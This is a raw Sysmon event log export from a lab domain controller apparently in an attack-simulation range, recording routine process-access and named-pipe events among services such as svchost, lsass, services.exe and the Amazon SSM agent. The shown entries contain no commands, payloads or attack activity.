12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.502{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.502{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.502{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.502{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.502{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.502{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.440{266CAFBE-646C-6064-1000-00000000AE01}1124\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDERC:\Windows\system32\svchost.exe 
10341000x80000000000000001729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.440{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.440{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.440{266CAFBE-646A-6064-0A00-00000000AE01}8403048C:\Windows\system32\services.exe{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3800-00000000AE01}3432C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.408{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.408{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.408{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.396{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.396{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.385{266CAFBE-647D-6064-2D00-00000000AE01}2364\Amazon\SSM\InstanceData\terminationC:\Program Files\Amazon\SSM\amazon-ssm-agent.exe 17141700x80000000000000001719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.385{266CAFBE-647D-6064-2D00-00000000AE01}2364\Amazon\SSM\InstanceData\healthC:\Program Files\Amazon\SSM\amazon-ssm-agent.exe 17141700x80000000000000001718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.384{266CAFBE-647D-6064-2D00-00000000AE01}2364\Amazon\SSM\InstanceData\testPipeC:\Program Files\Amazon\SSM\amazon-ssm-agent.exe 10341000x80000000000000001717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.376{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-647D-6064-2D00-00000000AE01}2364C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.351{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-647D-6064-3800-00000000AE01}3432C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.333{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3800-00000000AE01}3432C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.333{266CAFBE-646A-6064-0A00-00000000AE01}8403048C:\Windows\system32\services.exe{266CAFBE-647D-6064-3800-00000000AE01}3432C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4